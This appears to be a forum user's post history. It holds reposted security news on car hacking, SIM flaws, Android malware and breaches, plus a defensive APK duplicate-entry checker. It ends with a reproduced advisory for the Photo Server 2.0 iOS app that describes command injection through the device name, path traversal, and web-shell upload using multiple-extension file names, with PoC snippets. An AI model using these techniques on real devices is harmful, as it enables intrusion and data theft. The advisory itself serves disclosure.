Matt

Everything posted by Matt

  1. It's a ratio of 2/4. The correct answer being B, 50%. Two of the options are identical.
  2. As the others said, it could be 50%, because if you picked a and it isn't right, from that you deduce it's another one. So it's either a or b. Either a or c. Either a or d. Either a or b. So 50%.
  3. But a and d are the same option, 25%. That must be where the "trap" is.
  4. I think 25%. I hope I'm not making a blunder. If you pick 1 out of 4 you have a 25% chance. It's one option out of 4, times 100!? Or maybe I'm talking nonsense // Seems too easy, there's a catch somewhere..
  5. BASS ORCHESTRATOR Skrillex is offering his fans just a blank website thanks to a hacker group called Eboz that took it down for him. Skrillex makes the sort of music that teenagers play to annoy their parents, and makes anyone older than that generation say, "Well, it's just noise." We've linked one of his music tracks below. Make sure you move any china from the edge of any surfaces as you are about to experience a dubstep bassline. They are loud, rumbling and deep. According to the eHacking News website, the Turkish group Eboz was behind the attack, which was actually a defacement. We met Eboz at the end of last year when it took over a number of websites with Pakistani or .pk domain names. Then as now it replaced content on targeted websites with an image of some penguins. Some text accompanied the image, and it read, "Always there for me in my homeboys friend" and "Have not shot me with every breath", according to the eHacking News translation. Skrillex does not seem too bothered about the attention. In a message he laughed off the downtime, saying, "Damn somebody hacked/jacked skrillex.com haha" and "Stuff like this happens quite often". A poster on Skrillex's feed names Eboz as the hacker group, and offers a nicer translation of the text. "I am always with my bros," it said. "is there anybody not by my side in every breath?" Some commentators suggest that Skrillex should be pleased to have earned the attention of such a famous group. He acknowledged that it is "definitely memorable". Source: TheInquirer
  6. Rep. Justin Amash (R-Michigan) walks through a basement tunnel to the House of Representatives on Capitol Hill, for the vote on his amendment to a Pentagon spending bill that would cut funding to the National Security Agency’s massive phone surveillance program. Photo: J. Scott Applewhite/AP The House today narrowly defeated an amendment to a defense spending package that would have repealed authorization for the National Security Agency’s dragnet collection of phone-call metadata in the United States. The amendment to the roughly $600 billion Department of Defense Appropriations Act of 2014 would have ended authority for the once-secret spy program the White House insists is necessary to protect national security. The amendment (.pdf), one of dozens considered, was proposed by Rep. Justin Amash (R-Michigan). “The government collects the phone records without suspicion of every single American of the United States,” he said during heated debate on the measure. Rep. Mike Rogers (R-Michigan), in urging a no vote, said “Passing this amendment takes us back to September 10.” The vote was 205-217. Here is the vote count. The Obama administration lobbied hard to stop the amendment’s passage. White House spokesman Jay Carney said ahead of the vote: “This blunt approach is not the product of an informed, open, or deliberative process. We urge the House to reject the Amash amendment, and instead move forward with an approach that appropriately takes into account the need for a reasoned review of what tools can best secure the nation.” Carney did not mention that the massive surveillance program was itself not the product of an informed, open or deliberative process, but rather the product of secret court rulings and classified government memos, which came to light only through leaks by NSA whistleblower Edward Snowden. NSA chief Gen. Keith Alexander and James Clapper, the director of national intelligence, also lobbied lawmakers, urging them to vote no. 
The amendment was in response to a disclosure last month by the Guardian. The newspaper posted a leaked copy of a top secret Foreign Intelligence Surveillance Court opinion requiring Verizon Business to provide the National Security Agency the phone numbers of both parties involved in all calls, the International Mobile Subscriber Identity (IMSI) number for mobile callers, calling card numbers used in the call, and the time and duration of the calls. The government confirmed the authenticity of the leak and last week suggested many more, or “certain telecommunication service providers” are required to fork over the same type of metadata. The government says it needs all the data to sift out needles in a haystack. “This takes a leaf blower and blows away the entire haystack,” said Rep. Tom Cotton (R-Arkansas) in urging against the vote. The law that has been authorizing the surveillance is the Patriot Act — adopted six weeks after the 2001 terror attacks. The amendment substantially alters one of the most controversial provisions of the Patriot Act — Section 215 — that allows the secret Foreign Intelligence Surveillance Court to authorize broad warrants for most any type of “tangible” records, including those held by banks, doctors and phone companies. Lawmakers have repeatedly voted to prevent the act from expiring or against altering its language. Under the Patriot Act, the government only needs to show that the information is “relevant” to an authorized investigation. No connection to a terrorist or spy is required. 
The amendment would effectively gut the dragnet phone-metadata program that commenced following the 2001 terror attacks by only authorizing the metadata snooping against specified targets that are “the subject of an investigation.” The vote came days after the Obama administration told a federal judge overseeing a lawsuit about the program that the wholesale vacuuming up of all phone-call metadata in the United States is in the “public interest,” does not breach the constitutional rights of Americans, and cannot be challenged in a court of law because no individual Americans have legal standing to sue. Source: Wired.com
  7. Stomping on the brakes of a 3,500-pound Ford Escape that refuses to stop–or even slow down–produces a unique feeling of anxiety. In this case it also produces a deep groaning sound, like an angry water buffalo bellowing somewhere under the SUV’s chassis. The more I pound the pedal, the louder the groan gets–along with the delighted cackling of the two hackers sitting behind me in the backseat. Luckily, all of this is happening at less than 5mph. So the Escape merely plows into a stand of 6-foot-high weeds growing in the abandoned parking lot of a South Bend, Ind. strip mall that Charlie Miller and Chris Valasek have chosen as the testing grounds for the day’s experiments, a few of which are shown in the video below. (When Miller discovered the brake-disabling trick, he wasn’t so lucky: The soccer-mom mobile barreled through his garage, crushing his lawn mower and inflicting $150 worth of damage to the rear wall.) “Okay, now your brakes work again,” Miller says, tapping on a beat-up MacBook connected by a cable to an inconspicuous data port near the parking brake. I reverse out of the weeds and warily bring the car to a stop. “When you lose faith that a car will do what you tell it to do,” he adds after we jump out of the SUV, “it really changes your whole view of how the thing works.” This fact, that a car is not a simple machine of glass and steel but a hackable network of computers, is what Miller and Valasek have spent the last year trying to demonstrate. Miller, a 40-year-old security engineer at Twitter, and Valasek, the 31-year-old director of security intelligence at the Seattle consultancy IOActive, received an $80,000-plus grant last fall from the mad-scientist research arm of the Pentagon known as the Defense Advanced Research Projects Agency to root out security vulnerabilities in automobiles. 
The duo plans to release their findings and the attack software they developed at the hacker conference Defcon in Las Vegas next month–the better, they say, to help other researchers find and fix the auto industry’s security problems before malicious hackers get under the hoods of unsuspecting drivers. The need for scrutiny is growing as cars are increasingly automated and connected to the Internet, and the problem goes well beyond Toyota and Ford. Practically every American carmaker now offers a cellular service or Wi-Fi network like General Motors’ OnStar, Toyota’s Safety Connect and Ford’s SYNC. Mobile-industry trade group the GSMA estimates revenue from wireless devices in cars at $2.5 billion today and projects that number will grow tenfold by 2025. Without better security it’s all potentially vulnerable, and automakers are remaining mum or downplaying the issue. As I drove their vehicles for more than an hour, Miller and Valasek showed that they’ve reverse-engineered enough of the software of the Escape and the Toyota Prius (both the 2010 model) to demonstrate a range of nasty surprises: everything from annoyances like uncontrollably blasting the horn to serious hazards like slamming on the Prius’ brakes at high speeds. They sent commands from their laptops that killed power steering, spoofed the GPS and made pathological liars out of speedometers and odometers. Finally they directed me out to a country road, where Valasek showed that he could violently jerk the Prius’ steering at any speed, threatening to send us into a cornfield or a head-on collision. “Imagine you’re driving down a highway at 80,” Valasek says. “You’re going into the car next to you or into oncoming traffic. 
That’s going to be bad times.” A Ford spokesman says the company takes hackers “very seriously,” but Toyota, for its part, says it isn’t impressed by Miller and Valasek’s stunts: Real car hacking, the company’s safety manager John Hanson argues, wouldn’t require physically jacking into the target car. “Our focus, and that of the entire auto industry, is to prevent hacking from a remote wireless device outside of the vehicle,” he writes in an e-mail, adding that Toyota engineers test its vehicles against wireless attacks. “We believe our systems are robust and secure.” But Miller and Valasek’s work assumed physical access to the cars’ computers for a reason: Gaining wireless access to a car’s network is old news. A team of researchers at the University of Washington and the University of California, San Diego, experimenting on a sedan from an unnamed company in 2010, found that they could wirelessly penetrate the same critical systems Miller and Valasek targeted using the car’s OnStar-like cellular connection, Bluetooth bugs, a rogue Android app that synched with the car’s network from the driver’s smartphone or even a malicious audio file on a CD in the car’s stereo system. “Academics have shown you can get remote code execution,” says Valasek, using hacker jargon for the ability to start running commands on a system. “We showed you can do a lot of crazy things once you’re inside.” One of the UCSD professors involved in those earlier tests, Stefan Savage, claims that wireless hacks remain possible and affect the entire industry: Given that attacks on driving systems have yet to be spotted outside of a lab, manufacturers simply haven’t fully secured their software, he says. “The vulnerabilities that we found were the kind that existed on PCs in the early to mid-1990s, when computers were first getting on the Internet,” says Savage. As cars approach Google’s dream of passenger-carrying robots, more of their capabilities also become potentially hackable. 
Miller and Valasek exploited Toyota’s and Ford’s self-parking functions, for instance, to hijack their vehicles’ steering. A car like the 2014 Mercedes Benz S-Class, which can negotiate stop-and-go traffic or follow a leader without input, may offer a hacker even more points of attack, says Gartner Group analyst Thilo Koslowski. “The less the driver is involved, the more potential for failure when bad people are tampering with it,” he says. In the meantime, Miller and Valasek argue that the best way to pressure car companies to secure their products is to show exactly what can be done with a multi-ton missile on wheels. Better to experience the panic of a digitally hijacked SUV now than when a more malicious attacker is in control. “If the only thing keeping you from crashing your car is that no one is talking about this,” says Miller, “then you’re not safe anyway.” Source: Forbes.com
  8. The bank account would be fine.
  9. They have been posted before, but that was in the past.
  10. Well, these can go straight into that RST Market category without it being split up any further.
  11. The serious security problems affecting millions of SIM cards should be easy for operators to fix, according to the German security researcher who identified them. Karsten Nohl of Security Research Labs presented at the start of this week a summary of research he carried out, according to which millions of SIM cards probably use an outdated encryption system from the 1970s to authenticate over-the-air (OTA) software updates. Nohl found that certain types of SIM cards are easy to trick into disclosing the 56-bit DES (Data Encryption Standard) encryption key, which can be broken using an ordinary computer. Nohl discovered that, when a fake OTA update was sent to phones, some of the SIM cards sent back an error code containing this key. Spyware can then be sent to the device to access the phone's critical data through the card's Java Virtual Machine, a software framework present on almost every SIM card sold worldwide. Nohl explained in an interview that 500 million phones, regardless of brand, could be vulnerable. But the weak encryption problem and the return of an error code with a weak key can be fixed the same way they can be exploited: through an OTA update. SIM cards come in a wide variety of configurations. Operators send operators the specifications for the SIM cards to be used on their networks. Many SIM cards contain old configurations and outdated technology, such as DES, which dates back more than a decade, Nohl explained. For some SIM cards, DES encryption could be turned off and Triple DES, a more secure form of encryption in use today, turned on. 
Users will not even know their phones are being updated, given that operators frequently send updates using special SMS codes to change, for example, roaming settings, Nohl said. An OTA update can thus resolve the problem of phones returning the error message. Operators can also create an adjustment key for their SMS centers, which process all SMS messages. Since so many operators are affected, Nohl said his lab has contacted the GSM Association, sending it details of the research. Nohl will give a full presentation of the research on July 31 at the Black Hat security conference. Source: Computerworld
  12. Cyber threats aimed at stealing personal data and bank account login details are gaining more and more ground in the landscape of viruses for Android mobile devices. While viruses that send SMS messages to premium numbers are still at the top in terms of number of attacks, the new, more complex ransomware-type threats, which lock the device and demand payment of a fine, and banking viruses are recording sustained growth. Android banking viruses pretend to be digital certificate updates and thus trick users into downloading and installing them. If Zeus is the star of banking viruses for PCs, ZitMo is its counterpart on Android and is just as dangerous. It receives commands from a command and control server, to which it can send all the SMS messages the user receives on the phone. This way, hackers can intercept the transaction authentication number (mTAN) as soon as users initiate transactions. Acting through a PC infected with Zeus and a mobile device on which ZitMo intercepts the SMS messages, attackers gain complete control over a person's online banking transactions. Most ZitMo reports in the first half of this year come from China, and more than 5% of detections from Romania.
      ZitMo global distribution:
      1. China - 44.65%
      2. Germany - 14.47%
      3. Romania - 5.66%
      4. United States - 5.03%
      5. India - 5.03%
      6. Others - 25.16%
A new type of Android malware, detected in Asia, behaves the same way as PC ransomware. Disguised as an antivirus solution, this type of virus tricks users into downloading it, locks the device and then demands money to unlock it. 
The Android.FakeAV virus family is found more often in countries where users download apps from unofficial stores, tempted by the promise of an effective antivirus solution.
      FakeAV family global distribution:
      1. India - 32.70%
      2. Indonesia - 15.90%
      3. Malaysia - 6.96%
      4. Thailand - 4.68%
      5. Myanmar - 4.41%
      6. Philippines - 2.03%
      7. Pakistan - 1.95%
      8. Syria - 1.94%
      9. Romania - 1.85%
      10. Sudan - 1.66%
      11. Others - 25.92%
The aggressive ads shown to users of free apps are known for collecting personal data in order to tailor content to the user. Marketing agencies consider this type of information, which makes promotional campaigns more effective and more profitable, very valuable.
      Adware families worldwide:
      1. Android.Adware.Plankton - 53.34%
      2. Android.Adware.Mulad - 13.09%
      3. Android.Adware.Kuguo - 12.12%
      4. Android.Adware.Wapsx - 11.91%
      5. Android.Adware.Adwo - 8.82%
      6. Others - 0.72%
"In conclusion, against the background of weak regulation of the use of personal devices at the office and of their access to company data, attackers could exploit Android vulnerabilities and employees' lack of awareness to gain access to company systems. Thus, security solutions for Android are no longer optional but mandatory in the context of these new types of attacks," said Catalin Cosoi, Chief Security Strategist, Bitdefender. To protect Android mobile devices, Bitdefender recommends using the complete security solution Bitdefender Mobile Security. Source: Smartnews.ro
  13. UK homeware retailer Lakeland is asking its customers to change their passwords as a precaution following a hack attack that allowed cybercrooks to reach two of its encrypted databases. Lakeland sent an email to customers late on Tuesday admitting the breach, and informing them that it was resetting passwords. Users will be obliged to create a new password the next time they log in or try to shop with the retailer. The breach, which Lakeland detected last Friday (19 July), involved two encrypted databases. In a statement on its website, Lakeland admits it doesn't yet know if any data was actually stolen, though it's fair to point out that it's only days into a breach investigation and any computer forensics work takes time to do properly. Lakeland apologised to its customers for any inconvenience caused by the security flap, which only affects its online punters and not its store or mail order clients. Its statement goes on to blame the hack on a sophisticated assault against a "recently identified flaw" in an unspecified system. As things stand, Lakeland customers can be forgiven for being unsure whether their personal and financial data has been compromised. Lakeland's statement omits common reassurances that payment systems were unaffected. Although it offered some reassurance in an update to its official Twitter account stating "we have no evidence that any card data has been compromised", it hasn't said whether or not the encrypted databases that got hit contained payment information. Dodi Glenn, director of security content management at ThreatTrack Security, commented: “It is common practice to purge passwords in the event someone suspects a compromise of their database. While customers may be alarmed as is natural in these circumstances, Lakeland should work with the authorities to identify what information was leaked. Customers should have the right to know if their credit card numbers were stolen. 
Lakeland and others should take note that being proactive instead of reactive is the best approach, because brand reputation is priceless.” Source: TheRegister.co.uk
  14. Google's revamped Nexus 7 fondleslab is the first device to ship with Android 4.3, but other devices will be receiving the update over the air soon and owners of Google's flagship Nexus kit can already download system images. The new OS release is an incremental update to the Android 4.x line and it retains the "Jelly Bean" code name of the last two major releases. From the user's perspective, the most prominent new feature is support for restricted profiles, which allow the device owner to limit which apps specific user accounts are allowed to launch. Software developers can also have their apps advertise specific content or capabilities that can then be controlled via restricted profiles. Notifications have been upgraded so that apps can now observe the stream of notifications and present them in new ways, including sending them to a different device connected over Bluetooth. Device performance and responsiveness has also been improved in Android 4.3, including enhancements to hardware accelerated graphics rendering and reduced touch latency. Fonts and shapes now render more clearly, and the 2D graphics renderer can now scale across multiple CPU cores for some tasks. Further enhancing graphics performance, the new release introduces support for OpenGL ES 3.0, the latest version of the cross-platform mobile graphics standard, which includes an updated shading and texture-rendering engine with native support for high quality texture compression. The catch, though, is that it does require support from the underlying graphics hardware. Support is already in place for the Nexus 4, Nexus 10, and the new Nexus 7, with other devices to come later. Similarly, Android 4.3 introduces support for Bluetooth Smart Ready – aka the Low Energy portion of the Bluetooth 4.0 spec – but only on supported devices, which so far include the Nexus 4 and the new Nexus 7 only. 
The update also adds support for Bluetooth AVRCP 1.3, which enables more advanced control of remote media players from Android devices. A new, modular DRM framework makes it easier to add content controls to media apps, while new VP8 encoding and media-muxing capabilities offer new options for authoring media on Android devices. Android 4.3 also brings a variety of minor enhancements and new features, including improved app security via the SELinux framework, enhancements to localization and right-to-left language processing, improved logging and profiling tools for developers, accessibility improvements, and more. You can check out a detailed list in the update's official release notes. Who will get it and when? As for when you'll be able to get your hands on Android 4.3, that's hard to say. Google says it started rolling out the update for Nexus 4, Nexus 7 (old and new), Nexus 10, and HSPA+ Galaxy Nexus devices on Wednesday, but in practice it can take up to a month for over-the-air updates to reach every device. Die-hards who just can't wait also have the option of downloading factory firmware images direct from Google's developer site. The Chocolate Factory made images available on Wednesday for every device that's getting the over-the-air update. Note, however, that using these images means wiping your device. You'll also need an unlocked bootloader and a modicum of hacker-savvy, so this approach won't be for everyone. When devices not on Google's initial update list will get Android 4.3 is even less clear. As in the past, the CDMA version of the Galaxy Nexus from Verizon is not getting the update in this first round, and if previous Jelly Bean updates are any indication, it may be some time before it does. Timing for other phones will depend on handset makers and mobile carriers, but Google reps did mention at the launch event that an Android 4.3 update for the Samsung Galaxy S 4 would be "coming soon." ® Source: TheRegister.co.uk
  15. Edward Snowden's PRISM revelations will soon impact the balance sheets of US cloud vendors, according to the Cloud Security Alliance. The group claims the latest survey (PDF) of its 500 members suggests the NSA leaks would make more than half of the non-US respondents think twice about hosting their data with American-based providers, and more than 90 percent believe companies should be able to publish transparency-style reports about Patriot Act requests for customer data. The Patriot Act has frequently emerged as a significant concern among non-US corporations. For example, during 2012, Rackspace and Australian provider Macquarie Telecom sniped at each other over such risks. Rackspace had described statements that data stored in the US becomes subject to American snooping as “mischievous”. Sanguinity about the Patriot Act is no longer in vogue, however: 86 per cent of respondents worldwide believe that bit of legislation should either be abandoned entirely, or should be altered to provide better transparency about, and oversight of, its operations. However, American respondents to the survey don't believe the data sovereignty issue is going to dent their business, with 64 percent of those saying the Snowden affair isn't making it harder to conduct business offshore. ® Source: TheRegister.co.uk
  16. Virus-hunter Symantec says the Android master key vulnerability is being exploited in China, where half-a-dozen apps have shown up with malicious content hiding behind a supposedly-safe crypto key. The simple, straightforward and utterly stupid vulnerability arises because, as Bluebox Security demonstrated recently, someone with evil intent and hardly any expertise can pack an Android APK package (a Zip file under another extension) with files carrying the same name as those in the archive. As noted by El Reg here, Android's crypto system verifies the first version of any repeated file in an APK – but the installer picks up the large version. On 22 July, BitDefender identified a number of apps popping up on the Google Play store. Now, Symantec has joined the party, identifying apps in China that have been exploited with the vulnerability to plant malicious code. There are two apps designed for doctor-finding, a news app, an arcade game, and a betting/lottery app. The good news for Androiders outside the Great Firewall is that all the malicious apps were being distributed on Chinese Android marketplaces rather than Google Play. Symantec's post states that the same attacker embedded code in all the compromised apps. The aim of the attack is to remotely control devices, steal data such as IMEI and phone numbers, send premium SMS messages, and on rooted devices, disable some Chinese mobile security apps. ® Source: TheRegister.co.uk
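Added defensive check, not from the article and not Symantec's or Bluebox's code: a small Python routine that flags an APK (or any ZIP) whose central directory lists the same path more than once, which is the shape the master key issue relies on, and shows why two consumers of the same archive can disagree about its content. The archive it inspects is constructed inline for the demonstration.

```python
import io
import warnings
import zipfile
from collections import Counter


def find_duplicate_entries(archive_bytes: bytes) -> dict:
    """Return {name: count} for every path listed more than once.

    An APK is a plain ZIP under another extension. No legitimate package
    needs two entries with the same path, so a scanner can refuse or
    quarantine such a file before any installer touches it.
    """
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        counts = Counter(info.filename for info in zf.infolist())
    return {name: n for name, n in counts.items() if n > 1}


def entry_versions(archive_bytes: bytes, name: str) -> list:
    """Return the payload of every entry carrying `name`, in archive order.

    Walking infolist() exposes every copy; see resolved_by_name() for the
    single copy a name-based lookup would hand back.
    """
    versions = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.filename == name:
                with zf.open(info) as fh:
                    versions.append(fh.read())
    return versions


def resolved_by_name(archive_bytes: bytes, name: str) -> bytes:
    """Payload returned by a name lookup: zipfile keeps a dict keyed by
    filename, so the last listed copy wins. A verifier that checked the
    first copy and a consumer that uses this one disagree about the archive,
    which is the mismatch the article describes."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return zf.read(name)


def is_safe_to_install(archive_bytes: bytes) -> bool:
    """Policy hook: accept only archives with no duplicated paths."""
    return not find_duplicate_entries(archive_bytes)


def build_constructed_archive() -> bytes:
    """Constructed sample: a tiny ZIP whose classes.dex entry is listed twice.

    The first copy stands for the signed original, the second for a
    replacement appended after signing. zipfile only warns on duplicate
    names, so the warning is silenced while the sample is built.
    """
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("AndroidManifest.xml", b"<manifest/>")
            zf.writestr("classes.dex", b"ORIGINAL")
            zf.writestr("classes.dex", b"REPLACED")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_constructed_archive()
    print("duplicates:", find_duplicate_entries(sample))
    print("all classes.dex copies:", entry_versions(sample, "classes.dex"))
    print("name lookup returns:", resolved_by_name(sample, "classes.dex"))
    print("safe to install:", is_safe_to_install(sample))
```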
  17. Facebook-for-bosses website LinkedIn has fixed a security vulnerability that potentially allowed anyone to swipe users' OAuth login tokens. The flaw came to light after British software developer Richard Mitchell discovered part of LinkedIn's customer help website handed out the private OAuth token of the logged-in user. These otherwise secret tokens can be used by anyone to masquerade as LinkedIn users linked to those tokens, and potentially access profile information using APIs. Before handing over the sensitive data, JavaScript code on the help site merely checked that the previously visited page was served from LinkedIn.com - a trivial HTTP referrer check that can be easily circumvented. Thus, someone could log into LinkedIn and surf to a malicious web page with code embedded to poke the help site for the victim's OAuth token. "I quickly found a request to a JavaScript file including the API key for the help system which immediately returned an OAuth token for the user," Mitchell explained in a blog post. "You shouldn’t trust JavaScript or the referrer header exclusively for any kind of authorisation policy." Losing control of an OAuth token is a great deal less serious than compromised login credentials, but it's still bad news. Fortunately the LinkedIn flaw was identified and responsibly disclosed before any harm came of the bug. Mitchell privately reported the flaw on 3 July. The social network was able to fix the hole within a couple of days, and sent Mitchell a t-shirt as a small thank you for his efforts. The fix involved disabling requests without HTTP referrers, according to Mitchell. A LinkedIn spokesman confirmed to El Reg that Mitchell's account of the bug find was accurate. "We can confirm that we were notified of the OAuth vulnerability and took immediate action to fix the issue, which was resolved by our team within 48 hours of being notified," he said. ® Source: TheRegister.co.uk
  18. IBM has launched new real-time security management tools, including its QRadar Vulnerability Manager (QVM), which it said combs through potential security flaws and presents them to security officers in a more manageable format. QVM lists results from multiple security scanners alongside the latest X-Force Threat Intelligence reports and listings from the National Vulnerability Database to allow users to quickly get a grasp on which potential problems present the highest risk. The software also includes an embedded, PCI-certified scanner, which can be scheduled to run periodically or triggered based on network events. Brendan Hannigan, general manager at IBM Security Systems, said the firm's new product launch was a timely one. "Traditional vulnerability management solutions are fundamentally broken," he explained. "Vulnerability scanning today lacks network-wide visibility, contextual awareness and real-time scanning. These gaps mean even well-known and preventable vulnerabilities can be lost in an overload of data, leaving organisations exposed to high risks." Murray Benadie, managing director of IBM partner Zenith Systems, said he believed the new software was significant. "It can cut a huge list of vulnerabilities in half, if not more," he said. "Users will quickly see vulnerabilities on their networks, without trying to mash products together – that is how information falls through the cracks." In addition, the firm announced that it would be enhancing its intrusion prevention platforms with the introduction of IBM Security Network Protection XGS 5100, which includes better detection of SSL-based attacks. The update also allows security officers to issue a "virtual patch", technology which provides protection from ongoing unpatched security flaws. On Friday, IBM revealed its Q2 2013 financial results, with profits seeing a drop but its mainframe and software departments experiencing growth. Source: V3.co.uk
  19. Then congratulations. Everyone starts out with an IP Tools at the beginning.
  20. Did you write the code yourself?
  21. Description : Photo Server version 2.0 suffers from remote shell upload and command injection vulnerabilities.
      Author : Benjamin Kunz Mejri
      Source : Photo Server 2.0 Shell Upload / Command Injection ≈ Packet Storm
      Code :

```text
Title:
======
Photo Server 2.0 iOS - Multiple Critical Vulnerabilities

Date:
=====
2013-07-23

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1029

VL-ID:
=====
1029

Common Vulnerability Scoring System:
====================================
8.6

Introduction:
=============
Photo Server is the free (photos only) version of Video Server. Access your device`s camera roll from any
computer or device with a web browser on your local network router`s WiFi. With proper configuration of your
WiFi router, access can be made from the web browser of any computer or device connected to the internet.
Video transfer can be enabled either through the in-app upgrade or by clicking on and viewing an iAd
(iAds not available in all countries yet). The Bluetooth option allows you to transfer photos stored in your
camera roll between Apple iMobile devices such as the iPhone, iPod Touch, and iPad without WiFi. Once the
BlueTooth connection is established between the devices, choose your picture and the app automatically
begins transmitting it via BlueTooth to the other device. Once received on the other device you can view
the photograph and save it to your camera roll.

(Copy of the Homepage: https://itunes.apple.com/en/app/photo-server/id397545365 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a command injection and file include (arbitrary file
upload) vulnerability in the Photo Server 2.0 application (Apple iOS - iPad & iPhone).

Report-Timeline:
================
2013-07-23: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: Photo Server - Application 2.0

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
1.1
A local command/path injection web vulnerability is detected in the Photo Server 2.0 application
(Apple iOS - iPad & iPhone). The vulnerability allows injecting local commands via vulnerable system
values to compromise the Apple mobile iOS application.

The vulnerability is located in the index file dir listing module when processing the request to list
the iPad or iPhone device name. Local attackers can change the name of the device to inject the code and
request any local path or inject commands on the application side. The malicious context with the path
request executes when a user or victim is watching the file dir index listing.

Exploitation of the web vulnerability requires a local privileged iOS device account with restricted
access and no user interaction. Successful exploitation of the vulnerability results in unauthorized
execution of system specific commands and path requests.

Vulnerable Application(s):
                [+] Photo Server v2.0 - ITunes or AppStore (Apple)

Vulnerable Parameter(s):
                [+] device name

Affected Module(s):
                [+] Index File Dir Listing


1.2
A file include web vulnerability is detected in the Photo Server 2.0 application (Apple iOS - iPad & iPhone).
The file include vulnerability allows remote attackers to include (upload) local file or path requests to
compromise the application or service.

The vulnerability is located in the upload module when processing the upload of files with manipulated
names via the POST method. The attacker can inject local paths or files into the request context and
compromise the device. The validation has a bad side effect which increases the risk by allowing the
attack to be combined with persistently injected script code.

Exploitation of the file include web vulnerability requires no user interaction or privileged application
user account. Successful exploitation of the vulnerability results in unauthorized local file and path
requests to compromise the device or application.

Vulnerable Module(s):
                [+] Upload (Files)

Vulnerable Parameter(s):
                [+] filename

Affected Module(s):
                [+] Index File Dir Listing


1.3
An arbitrary file upload web vulnerability is detected in the Photo Server 2.0 application
(Apple iOS - iPad & iPhone). The arbitrary file upload issue allows a remote attacker to upload files
with multiple extensions to bypass the validation for unauthorized access.

The vulnerability is located in the upload module when processing the upload of files with multiple
trailing extensions. Attackers are able to upload php or js web-shells by renaming the file with multiple
extensions. For example, the attacker uploads a web-shell with the following name and extension:
image.jpg.js.php.jpg . After the upload he deletes the jpg in the request to access the malicious file
(web-shell) without authorization and compromise the web-server or mobile device.

Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged
application user account. Successful exploitation of the vulnerability results in unauthorized file access
because of a compromise after the upload of web-shells.

Vulnerable Module(s):
                [+] Upload (Files)

Vulnerable Parameter(s):
                [+] filename (multiple extensions)

Affected Module(s):
                [+] Index File Dir Listing


Proof of Concept:
=================
1.1
The local command/path inject web vulnerability can be exploited by local attackers with device access
and without user interaction. For demonstration or reproduce ...

PoC:
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>iPad ¥337 360* >"<[COMMAND/PATH INJECT VULNERABILITY]> Photo Server app's Web Browser Interface Page</title></head><body>
<center><h2>iPad ¥337 360* >"<[COMMAND/PATH INJECT VULNERABILITY]">'s Photo Server App Web Browser Interface Page</h2></center>
<form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
<label>Choose QuickTime (.MOV) or JPEG (.JPG or .jpeg) file to upload to iPad ¥337 360* >"<iframe src=a>:
<input type="file" name="file" id="file" value="Choose file..." /></label>
<label><input type="submit" name="button" id="button" value="Upload" /></label></form><hr>
<p><i>Save videos or photos of the links below to hard drive by using context menu's (mouse right-click) Save Link As ... function.</i><hr>
<h1>The Video and Photo List</h1>
<li><a href='assets-library---asset/asset.PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG'><img

--- Request Session Log ---
Status: 200[OK]
GET http://192.168.2.104:8888/vulnerabilitylab
Load Flags[LOAD_DOCUMENT_URI ] Content Size[3032] Mime Type[application/x-unknown-content-type]

Request Headers:
Host[192.168.2.104:8888]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer [http://192.168.2.104:8888/]
Connection[keep-alive]

Response Headers:
Accept-Ranges[bytes]
Content-Length[3032]
Date[So., 21 Jul 2013 10:13:51 GMT]


1.2
The file include web vulnerability can be exploited by remote attackers without an application user account
and user interaction. For demonstration or reproduce ...

PoC:
<hr><h1>The Video and Photo List</h1>
<li><a href="http://192.168.2.104:8888/assets-library---asset/../[File Include Vulnerability].PNG
?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG"><img src="iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%20Web%20Browser%20Interface%20Page_files/../[File Include Vulnerability].PNG">assets-library---asset/../[File Include Vulnerability].PNG
?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG</a>


1.3
The arbitrary file upload vulnerability can be exploited by remote attackers without an application user
account and user interaction. For demonstration or reproduce ...

PoC:
<hr><h1>The Video and Photo List</h1>
<li><a href="http://192.168.2.104:8888/assets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG
?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG"><img src="iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%20Web%20Browser%20Interface%20Page_files/pentester23.PNG.jpg.html.php.js.gif.PNG">assets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG
?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG</a>

Note: After the upload request, the attacker can open the localhost:8888 webserver again and access the
folder via an include of the filename.


Solution:
=========
1.1
The command/path injection web vulnerability can be patched by a secure parse or encoding of the 2 index
locations with the device name.

1.2
The file include web vulnerability can be patched by a secure parse of the POST method request when
processing to upload a manipulated file. Encode, filter or parse also the output listing in the index
with the existing file names.

1.3
Disallow multiple extensions by secure filtering of the POST method request when processing to upload a
file with multiple extensions. Change the web app http server settings and file access rights to prevent
the execution of js, html and php files.


Risk:
=====
1.1
The security risk of the command/path inject web vulnerability is estimated as high.

1.2
The security risk of the file include web vulnerability is estimated as critical.

1.3
The security risk of the arbitrary file upload vulnerability is estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
